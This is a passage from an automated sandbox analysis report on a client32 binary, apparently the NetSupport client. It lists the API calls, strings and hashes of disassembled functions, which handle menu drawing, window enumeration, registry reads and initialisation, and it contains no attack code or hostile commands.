                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1101F0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 116windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 1101F0FE
                                                                                                                              • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                                                                • Part of subcall function 110CCE60: GetWindowRect.USER32 ref: 110CCE7C
                                                                                                                                • Part of subcall function 110CCE60: SetRectEmpty.USER32 ref: 110CCE88
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                                                              • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                                                              • _memset.LIBCMT ref: 1101F1CF
                                                                                                                              • GetMenuItemInfoA.USER32 ref: 1101F20C
                                                                                                                              • __strdup.LIBCMT ref: 1101F221
                                                                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                                                                              • String ID: 0$MakeOwnerDraw
                                                                                                                              • API String ID: 1249465458-1190305232
                                                                                                                              • Opcode ID: 8c9bd2224f42fac49adbc09d6f8f2acc0ae91da077bc4100c348b21e51c723fb
                                                                                                                              • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                                                                              • Opcode Fuzzy Hash: 8c9bd2224f42fac49adbc09d6f8f2acc0ae91da077bc4100c348b21e51c723fb
                                                                                                                              • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11008270 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 264windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ReleaseDC.USER32 ref: 110082C5
                                                                                                                              • _free.LIBCMT ref: 110083F3
                                                                                                                              • SelectObject.GDI32(?,?), ref: 11008415
                                                                                                                              • DeleteDC.GDI32(?), ref: 11008422
                                                                                                                              • DeleteObject.GDI32(?), ref: 1100842F
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              • GetDC.USER32(00000000), ref: 1100845D
                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1100846A
                                                                                                                              • CreateCompatibleBitmap.GDI32(?,00000004,00000010), ref: 11008481
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 11008495
                                                                                                                              • _malloc.LIBCMT ref: 110084F5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$CompatibleCreateDeleteSelect$BitmapErrorExitLastMessageProcessRelease_free_mallocwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 2152670842-2830328467
                                                                                                                              • Opcode ID: c7c39d7ce50363666ecc36a40fb8865d8f2e1097c2e47af604b199f5b0cbd890
                                                                                                                              • Instruction ID: 3850b8ccd8beb0e98ab4cbe1f7b01c035796fd6338f527faacd148ed971815aa
                                                                                                                              • Opcode Fuzzy Hash: c7c39d7ce50363666ecc36a40fb8865d8f2e1097c2e47af604b199f5b0cbd890
                                                                                                                              • Instruction Fuzzy Hash: D0B1F7B5A00B019FD364CF29C984AD7B7E5FB88359F10892EE5AE97351DB30B941CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • wsprintfA.USER32 ref: 1105F251
                                                                                                                              • wsprintfA.USER32 ref: 1105F265
                                                                                                                                • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,775EC740,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                                                                • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                                                              • wsprintfA.USER32 ref: 1105F5D6
                                                                                                                                • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                                                                              • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                              • API String ID: 273891520-33395967
                                                                                                                              • Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                                                              • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                                                                              • Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                                                              • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wsprintf
                                                                                                                              • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                              • API String ID: 2111968516-2092292787
                                                                                                                              • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                              • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                                                              • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                              • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11016500 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 154windowtimethreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32 ref: 1101653C
                                                                                                                              • IsWindowVisible.USER32 ref: 11016549
                                                                                                                              • GetWindow.USER32(?,00000004), ref: 11016556
                                                                                                                              • IsWindowVisible.USER32 ref: 11016561
                                                                                                                              • GetClassNameA.USER32(?,?,00000020), ref: 11016576
                                                                                                                              • SendMessageTimeoutA.USER32(?,0000000D,000000C8,?,00000002,00000064,?), ref: 110165DF
                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 11016604
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 1101665F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Visible$ClassDeleteMessageNameObjectProcessRectSendThreadTimeout
                                                                                                                              • String ID: NSMWControl32$NSSWControl32$Progman
                                                                                                                              • API String ID: 3572104470-975155618
                                                                                                                              • Opcode ID: bfe4d183ef4a763e56f4febadc0cef329845e0ecb9157d133a437f6c6d52cc1e
                                                                                                                              • Instruction ID: e961a916bbbcfe8b57c7ffd2e482cea40bc41dda2ab4819b6da64e7ff7338971
                                                                                                                              • Opcode Fuzzy Hash: bfe4d183ef4a763e56f4febadc0cef329845e0ecb9157d133a437f6c6d52cc1e
                                                                                                                              • Instruction Fuzzy Hash: AE514175D102299FDB54DF64CC84BEDB7B4BF49304F0041A9E519E7284EB74AA84CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110762B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InitializeCriticalSection.KERNEL32(111EE708,30AC22AD,1110FB6D,00000000,00000000,00000000,E8111B71,111834F3,000000FF,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000), ref: 110762FE
                                                                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                              • InitializeCriticalSection.KERNEL32(0000000C,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,30AC22AD,00000000,00000001,00000000,00000000,1118B138,000000FF), ref: 11076367
                                                                                                                              • InitializeCriticalSection.KERNEL32(00000024,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,30AC22AD,00000000,00000001,00000000,00000000,1118B138,000000FF), ref: 1107636D
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,30AC22AD,00000000,00000001,00000000,00000000), ref: 11076377
                                                                                                                              • InitializeCriticalSection.KERNEL32(000004D0,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,30AC22AD,00000000,00000001,00000000,00000000), ref: 110763CC
                                                                                                                              • InitializeCriticalSection.KERNEL32(000004F8,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,30AC22AD,00000000,00000001,00000000,00000000), ref: 110763D5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalInitializeSection$CreateEvent__wcstoi64
                                                                                                                              • String ID: *MaxRxPending$*TraceRecv$*TraceSend$General$_debug
                                                                                                                              • API String ID: 4263422321-2298398812
                                                                                                                              • Opcode ID: 0b96e1c81911b52a60123cc90dfea1351b46d2e8f68ee3004aafeab67e43f83b
                                                                                                                              • Instruction ID: 06ccc5540fe39e817025fd6f1a9fd6d6e0fa44080d25a9a2500616ed5f0e287a
                                                                                                                              • Opcode Fuzzy Hash: 0b96e1c81911b52a60123cc90dfea1351b46d2e8f68ee3004aafeab67e43f83b
                                                                                                                              • Instruction Fuzzy Hash: F651DF75A002859FDB11CF65CC84B9ABBE8FF84304F0485BAED599F245DB71A904CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111242E0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                              • GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000,00000001), ref: 1112433F
                                                                                                                              • InterlockedExchange.KERNEL32(111F19B4,00000001), ref: 11124365
                                                                                                                              • CreateWindowExA.USER32 ref: 111243AB
                                                                                                                              • SetWindowLongA.USER32 ref: 111243CB
                                                                                                                              • SetFocus.USER32(00000000), ref: 111243E2
                                                                                                                              • SetWindowLongA.USER32 ref: 111243FC
                                                                                                                              • DestroyWindow.USER32(00000000), ref: 11124412
                                                                                                                              • InterlockedExchange.KERNEL32(111F19B4,00000000), ref: 11124429
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
                                                                                                                              • String ID: *NoHideFEP$View$button
                                                                                                                              • API String ID: 1610953178-1502386645
                                                                                                                              • Opcode ID: 4c2b3a49d1fdf28c967e287d2f6982134d0f10b0c669199ca616fae4ed85a006
                                                                                                                              • Instruction ID: e7f43078c421523e46d189802bbe7ea8140fa8570dcc46dc3c934ff96bec0ddb
                                                                                                                              • Opcode Fuzzy Hash: 4c2b3a49d1fdf28c967e287d2f6982134d0f10b0c669199ca616fae4ed85a006
                                                                                                                              • Instruction Fuzzy Hash: 4831C134686266EFE724CF61DEC4B66FBB8BB0530DF940228F92593984EB70A504CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                                                                              • GetStockObject.GDI32(00000007), ref: 11003089
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                                                                              • SelectObject.GDI32(?,?), ref: 110030A7
                                                                                                                              • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                                                                              • GetSysColor.USER32(00000004), ref: 110030EB
                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                                                                              • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                                                                              • SelectObject.GDI32(?,?), ref: 1100311E
                                                                                                                              • SelectObject.GDI32(?,?), ref: 11003128
                                                                                                                              • DeleteObject.GDI32(?), ref: 1100312E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4121194973-0
                                                                                                                              • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                                                              • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                                                              • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                                                              • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1101F2A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 70windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                                                                              • _memset.LIBCMT ref: 1101F2D8
                                                                                                                              • GetMenuItemInfoA.USER32 ref: 1101F2F6
                                                                                                                              • _free.LIBCMT ref: 1101F305
                                                                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                              • _free.LIBCMT ref: 1101F30E
